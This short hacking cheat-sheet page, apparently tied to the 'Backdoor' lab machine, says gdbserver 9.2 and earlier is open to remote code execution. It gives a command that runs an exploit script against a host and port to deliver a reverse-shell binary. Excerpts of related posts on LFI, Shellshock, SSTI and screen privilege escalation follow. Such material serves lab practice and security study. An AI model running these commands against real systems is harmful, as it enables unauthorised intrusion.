If the gdbserver is 9.2 or prior it is vulnerable to a RCE exploitation:
Exploit: gdbserver
1 sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin
1
sudo python3 gdbserver_rce.py 10.10.11.125:1337 rev.bin
Examples: Backdoor
Content WordPress Local File Inclusion Vulnerability (LFI) LFI to RCE (Abusing /proc/PID/cmdline) Gdbserver RCE Vulnerability Abusing Screen (Privilege Escalation) [Session synchronizatio...
Finding the Vulnerability First you need to find a script (.sh,.pl,.cgi,etc.), most commonly under cgi-bin folder, for this task the best tool is nikto: 1 nikto -h <IP> Testing the Vulnerab...
Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circ...
SUID Screen Exploitation
Backdoor (Medium)
